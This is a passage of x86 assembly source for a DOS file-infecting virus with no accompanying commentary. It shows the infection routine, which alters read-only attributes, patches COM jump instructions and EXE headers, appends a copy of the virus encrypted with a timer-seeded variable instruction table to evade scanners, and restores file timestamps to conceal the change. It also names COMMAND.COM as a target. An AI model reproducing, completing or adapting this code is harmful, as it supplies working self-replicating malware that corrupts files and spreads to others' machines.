Infect_File Proc Near
Call Save_Regs
Mov Ax, 4300h
Call Do_21
Jb IF00
Push Cx
And Cl, 01h
Cmp Cl, 01h
Pop Cx
Jne H00
And Cl, 0FEh
Mov Ax, 4301h
Call Do_21
H00: Mov Ax, 3D02h
Call Do_21
Jnb IF02
IF00: Jmp IFE4
IF02: Xchg Bx, Ax
Push Cs
Push Cs
Pop Ds
Pop Es
Mov Ax, 5700h
Call Do_21
Push Dx
Push Cx
And Cl, 1Fh
Cmp Cl, 1Fh
Je IF05
Mov Dx, offset Exe_Header
Mov Cx, offset Exe_Header_End-offset Exe_Header
Mov Ah, 3Fh
Call Do_21
Jnb IF10
IF05: Stc
Jmp IFE2
IF10: Cmp Ax, Cx
Jne IF05
Xor Dx, Dx
Mov Cx, Dx
Mov Ax, 4202h
Call Do_21
Or Dx, Dx
Jne IF12
Cmp Ax, offset Virus_End+Stack_Size
Jb IF05
IF12: Cmp Word ptr Ds:Sign, 'ZM'
Je EXE_type
COM_type:
Cmp Byte ptr Ds:Sign+3, 'O'
Je IF05
Cmp Byte ptr Ds:Command_Flag, 00h
Je CT00
Sub Ax, offset Virus_End
Xchg Dx, Ax
Xor Cx, Cx
Mov Ax, 4200h
Call Do_21
CT00: Mov Si, offset Sign
Mov Di, offset Start_Code
Movsw
Movsw
Sub Ax, 0003h
Mov Byte ptr Ds:Sign, 0E9h
Mov Word ptr Ds:Sign+1, Ax
Mov Byte ptr Ds:Sign+3, 'O'
Add Ax, (offset V05-V05_Back)+0103H
Jmp short IF30
EXE_type:
Cmp Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
Je IF05
Cmp Word ptr Ds:Overlay_Num, 0000h
Jne IF05
Push Dx
Push Ax
Mov Cl, 04h
Ror Dx, Cl
Shr Ax, Cl
Add Ax, Dx
Sub Ax, Word ptr Ds:Size_Header
Mov Si, offset Start_Ip
Mov Di, offset Start_Code
Movsw
Movsw
Mov Si, offset Stack_Ss
Movsw
Movsw
Mov Word ptr Ds:Start_Cs, Ax
Mov Word ptr Ds:Stack_Ss, Ax
Mov Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
Pop Ax
Pop Dx
Push Ax
Add Ax, offset Virus_End+Stack_Size
Jnb IF29
Inc Dx
IF29: Mov Cx, 512
Div Cx
Mov Word ptr Ds:File_Size, Ax
Mov Word ptr Ds:Remainder, Dx
Pop Ax
And Ax, 000Fh
Mov Word ptr Ds:Start_Ip, Ax
Add Ax, (offset V05-V05_Back)
IF30: Mov Word ptr Ds:V00+1, Ax
Push Ds
Xor Si, Si
Mov Ds, Si
Mov Ax, Word ptr Ds:[046Ch]
Pop Ds
Push Bx
Mov Byte ptr Ds:V01+1, Ah
And Ax, 000Fh
Xchg Bx, Ax
Shl Bx, 01h
Mov Ax, Word ptr [Bx].Random_AL
Mov Word ptr Ds:V03, Ax
Mov Di, offset Real_End
Mov Cx, offset Virus_End
Push Cx
Cld
Rep Movsb
Mov Bx, (offset V05-V05_Back)
Push Word ptr [Bx]
Mov Byte ptr [Bx+V05_Back], 0C3h
Push Bx
Xor Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h
Add Bx, offset Real_End ; Toggle ADD [BX],AL/SUB [BX],AL
Call V04
Pop Bx
Pop Word ptr [Bx]
Mov Dx, offset Real_End
Pop Cx
Pop Bx
Mov Ah, 40h
Call Do_21
IFE1: Jb IFE2
Xor Dx, Dx
Mov Cx, Dx
Mov Ax, 4200h
Call Do_21
Jb IFE2
Mov Dx, offset Exe_Header
Mov Cx, offset Exe_Header_End-offset Exe_Header
Mov Ah, 40h
Call Do_21
IFE2: Pop Cx
Pop Dx
Jb IFE3
Cmp Byte ptr Ds:Command_Flag, 0FFh
Je IFE3
Or Cl, 1Fh
IFE3: Mov Ax, 5701h
Call Do_21
Mov Ah, 3Eh
Call Do_21
IFE4: Mov Byte ptr Cs:Command_Flag, 00h
Call Restore_Regs
Ret
Infect_File Endp
Do_21 Proc Near
Pushf
Call Dword ptr Cs:Saved_21
Ret
Do_21 Endp
Save_Regs:
Push Bp
Mov Bp, Sp
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Ds
Push Es
Pushf
Xchg [Bp+02], Ax
Push Ax
Mov Ax, [Bp+02]
Ret
Restore_Regs:
Pop Ax
Xchg [Bp+02], Ax
Popf
Pop Es
Pop Ds
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Bp
Ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Random_AL:
Inc Al ; 0
Dec Al ; 1
Inc Ax ; 2
Inc Ax
Dec Ax ; 3
Dec Ax
Add Al, Cl ; 4
Sub Al, Cl ; 5
Xor Al, Cl ; 6
Xor Al, Ch ; 7
Not Al ; 8
Neg Al ; 9
Ror Al, 01h ; A
Rol Al, 01h ; B
Ror Al, Cl ; C
Rol Al, Cl ; D
Nop ; E
Nop
Add Al, Ch ; F
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
COMSPEC_name db 'COMSPEC='
COMMAND_file db '\COMMAND.COM',0
FILE_Exts db 'COMEXEOVL'
NUM_Exts equ 3
Start_Code dw 00000h
dw 0FFF0h
Start_Stack dw ?
dw 0FFFFh
Org 400h
Virus_End:
Saved_24 dw ?,?
Command_Flag db 0
Temp dw ?
Exe_Header:
Sign dw ?
Remainder dw ?
File_Size dw ?
Num_Real dw ?
Size_Header dw ?
Min_Above dw ?
Max_Above dw ?
Stack_Ss dw ?
Stack_Sp dw ?
CheckSum dw ?
Start_Ip dw ?
Start_Cs dw ?
Display_Real dw ?
Overlay_Num dw ?
Exe_Header_End:
Real_End:
Code Ends
End Virus_Begin